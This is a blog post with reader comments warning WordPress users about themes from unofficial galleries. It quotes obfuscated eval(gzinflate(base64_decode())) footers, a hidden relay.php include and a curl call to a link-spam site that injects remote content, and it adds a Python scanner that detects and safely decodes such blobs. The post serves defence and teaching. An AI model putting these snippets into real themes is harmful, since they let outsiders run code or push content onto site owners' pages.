Say No To Encrypted Footers

In December of last year I wrote a post about certain WordPress themes containing encrypted or obfuscated code. Thanks to a recent post in the forums I thought it would be a good idea to once again touch upon the topic.

There are a growing number of unofficial WordPress theme galleries popping up all over the web. New ones appear every day. While many of these sites are harmless a large number of them should be avoided like the plague. Why? Because they distribute shady and in some cases dangerous themes.

A common tactic of some of these galleries is to encrypt or otherwise obfuscate the code in certain files, the most popular being footer.php. I've seen some cases where footer.php was clean but did contain a file include that called another file that was indeed encrypted. They do this as a way to protect the spammy links they place in the footer of these themes. The problem is this technique could easily be used for something far more sinister. If you have seen one of these footer files you know what I'm talking about. Here is an example,

<?php
eval(gzinflate(base64_decode('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')));
?>

This is potentially very dangerous code. You have no idea what it is or what it does, so uploading it to your server is just plain stupid. Look at the call to base64_decode(). That function decodes the string contained within the (), gzinflate() then decompresses the result, and eval evaluates, or executes, whatever comes out as PHP code. Therein lies the danger.

As more people become aware of this practice the authors have begun to change their tactics. I mentioned earlier a footer file that was clean except for the fact it contained a file include that called an encrypted file. Here is an example of one such file I inspected yesterday evening,

</div><?php //content ?>
</div><?php //container ?>
<div id="footer" class="clear">
© <?php echo date("Y");?> - <?php bloginfo('name'); ?><br/>
Created by <a href="http://www.themespreview.com/">Wordpress Themes</a> Preview | Supported by <a href="http://www.hostrefer.com/">Web Hosting</a> Refer | <?php include (TEMPLATEPATH . "/relay.php"); ?>
</div>
</div></div></div>
</body>
</html>

Now, to the uninformed, the above footer file appears clean. What struck me as odd is the file include. Note the line <?php include (TEMPLATEPATH . "/relay.php"); ?>. That is a file include. I wondered why a file include would be inserted into footer.php, so I immediately took a look at relay.php and this is what I found,

<? eval(gzinflate(base64_decode('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'))); ?>

Pretty sneaky eh? They could use a file include to call a file anywhere in your theme. They could place the encrypted file in your theme's image folder and use an include to call it. Unless you have some degree of experience you would be none the wiser.

An even sneakier technique, and one I've not encountered until today, is the use of curl. curl is a client that can retrieve files from a server using any supported protocol such as ftp, http or https, to name a few. Here is an example of its use in a footer.php file I took a look at earlier today,

<?php
// ... the preceding if branch was not shown in the original post ...
elseif(function_exists('curl_init')) {
    $ch = curl_init ("http://www.build-reciprocal-links.com/wordpress.asp"); // fetch a page from a remote server
    curl_setopt ($ch, CURLOPT_HEADER, 0);                                    // leave the HTTP headers out of the output
    curl_exec ($ch);                                                         // whatever the remote server returns is printed straight into your page
}
?>

Using this, the originating server can display anything, and I mean anything, it wants to on your web site! This has absolutely no legitimate use in a theme.
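All three tricks above (eval of a base64/gzinflate blob, an include of a file elsewhere in the theme, and a curl fetch of a remote page) can be spotted with plain pattern matching before you upload anything. The following is an added example of mine, not code from the original post or from WordPress: a small Python scanner that walks a set of theme files, flags those patterns, and for an eval(gzinflate(base64_decode('...'))) blob decodes the payload so you can read it without ever executing it. It also follows nested blobs (a decoded payload that is itself another eval blob), which the post does not show but which the same decode step handles. The theme files below are constructed samples; the payload is built from a harmless PHP string, and the URL uses the reserved example.invalid domain.

```python
import base64
import re
import zlib
from typing import Dict, List, Optional

# --- patterns for the techniques described in the post -----------------------
PATTERNS = {
    # eval() fed by a decoding/decompressing function: eval(gzinflate(base64_decode(...)))
    "eval_of_decoded_data": re.compile(
        r"\beval\s*\(\s*(gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(", re.I),
    # include/require of a file located via TEMPLATEPATH (e.g. relay.php hidden in the theme)
    "include_from_template": re.compile(
        r"\b(include|require)(_once)?\s*\(?\s*TEMPLATEPATH", re.I),
    # curl used to pull remote content into the rendered page
    "remote_fetch_curl": re.compile(r"\bcurl_(init|exec)\s*\(", re.I),
}

# Exact shape of the blob from the post: eval(gzinflate(base64_decode('<base64>')))
EVAL_GZ_B64 = re.compile(
    r"\beval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)\s*\)",
    re.I,
)


def deflate_raw(data: bytes) -> bytes:
    """Raw DEFLATE (what PHP's gzdeflate() produces and gzinflate() expects)."""
    c = zlib.compressobj(level=9, wbits=-zlib.MAX_WBITS)
    return c.compress(data) + c.flush()


def inflate_raw(data: bytes) -> bytes:
    """Inverse of deflate_raw; equivalent to PHP's gzinflate()."""
    return zlib.decompress(data, -zlib.MAX_WBITS)


def scan_theme(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Return {filename: [finding, ...]} for every file that matches a pattern."""
    findings: Dict[str, List[str]] = {}
    for name, source in files.items():
        hits = [label for label, rx in PATTERNS.items() if rx.search(source)]
        if hits:
            findings[name] = hits
    return findings


def peek_payload(source: str, max_depth: int = 5) -> Optional[bytes]:
    """Decode an eval(gzinflate(base64_decode('...'))) payload WITHOUT executing it.

    Obfuscators sometimes nest one blob inside another, so keep decoding while
    the result is itself such a blob (bounded by max_depth). Returns None when
    the source contains no such blob.
    """
    decoded: Optional[bytes] = None
    current = source
    for _ in range(max_depth):
        m = EVAL_GZ_B64.search(current)
        if not m:
            break
        try:
            decoded = inflate_raw(base64.b64decode(m.group(1)))
        except (zlib.error, ValueError):
            break  # malformed blob: return whatever was decoded so far
        current = decoded.decode("latin-1")
    return decoded


# --- constructed sample theme (not the files from the post) -------------------
HARMLESS_PHP = b'<?php echo "footer link"; ?>'
PAYLOAD = base64.b64encode(deflate_raw(HARMLESS_PHP)).decode()

SAMPLE_THEME = {
    "footer.php": (
        '</div>\n<div id="footer" class="clear">\n'
        "&copy; <?php echo date(\"Y\"); ?> - <?php bloginfo('name'); ?><br/>\n"
        '<?php include (TEMPLATEPATH . "/relay.php"); ?>\n</div>\n'
    ),
    "relay.php": f"<? eval(gzinflate(base64_decode('{PAYLOAD}'))); ?>",
    "sidebar.php": (
        "<?php if (function_exists('curl_init')) {\n"
        "    $ch = curl_init(\"http://example.invalid/remote.asp\");\n"  # placeholder host
        "    curl_setopt($ch, CURLOPT_HEADER, 0);\n"
        "    curl_exec($ch);\n}\n?>"
    ),
    "header.php": "<?php wp_head(); ?>",  # clean file, should produce no finding
}


if __name__ == "__main__":
    for name, hits in scan_theme(SAMPLE_THEME).items():
        print(f"{name}: {', '.join(hits)}")
        payload = peek_payload(SAMPLE_THEME[name])
        if payload is not None:
            print("  decoded payload (not executed):", payload.decode("latin-1"))
```

Run it over a real download by reading every file under the theme directory into the dictionary; anything in the eval_of_decoded_data or remote_fetch_curl buckets is reason enough to discard the theme, and any include flagged should be followed to the file it names, exactly as the post does with relay.php.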

I don't mean to paint all theme galleries with the same brush as there are some very good ones out there. Unfortunately there are also some shitty ones and the onus is on you - the webmaster - to differentiate between them. When downloading a theme from such a place always carefully inspect each and every file before uploading it to your server. If you're unsure ask someone or post your question in the WordPress Support Forum.

Remember, never use a theme that contains such code.

About Len Kutchma

Len has been blogging for over 10 years and is a rabid WordPress fan. In addition to blogging here you can find him writing the occasional article and toiling away in the forums at WeblogToolsCollection.com. He also hangs out at the WordPress support forums lending a hand where he can. Be sure to follow @wpcanada on Twitter.

Comments

  1. mrmist says:

    Yep. I'm starting to hate seeing these things around. I think it's pretty bad practice for "legitimate" theme writers to be using stuff like this, when script kiddies use the same sort of thing to distribute their hacks.

    That curl thing is particularly bad. People who are none the wiser could use that, leaving themselves wide open. If the curled site was compromised that potentially compromises all the theme downloaders. sigh.

  2. Len Kutchma says:

    Hi mrmist,

    The vast majority of authors are reputable people but for whatever reason users keep downloading themes from shady sites. I don't know why this is. I'm thinking maybe it's because these users are new and don't know where to get themes so they start Googling around and end up on a shady site.

    Yeah, that curl bit was a new one for me too. That's the first time I had ever seen it used that way. I wonder how long that tactic has been used before I became aware of it.

  3. Ruby says:

    Wow. I've occasionally encountered themes that would refer to a website that does stat counting... I noticed some traffic in that regard... but this, this is a whole other level. I'm glad that I build most of my themes from scratch, but it's true... until now, I've never inspected all the pages included in a theme. It's definitely worthwhile!

  4. Len Kutchma says:

    Hi Ruby,

    In the vast majority of cases this is simply a technique to protect the spammy links they stick in the footer. The problem is, as I said in the post, this could be used for something far more nefarious. Best course of action is simply don't use these themes.

    The WordPress theme repository contains thousands of clean themes to choose from. Additionally, there are many reputable authors in the WP community who create wonderful themes. A few names that come to mind are Brian Gardner, Cory Miller, Nathan Rice, Darren Hoyt, Justin Tadlock, Derek Punsalan, Adii Rockstar. There are many more, these are merely a few of my favourites.
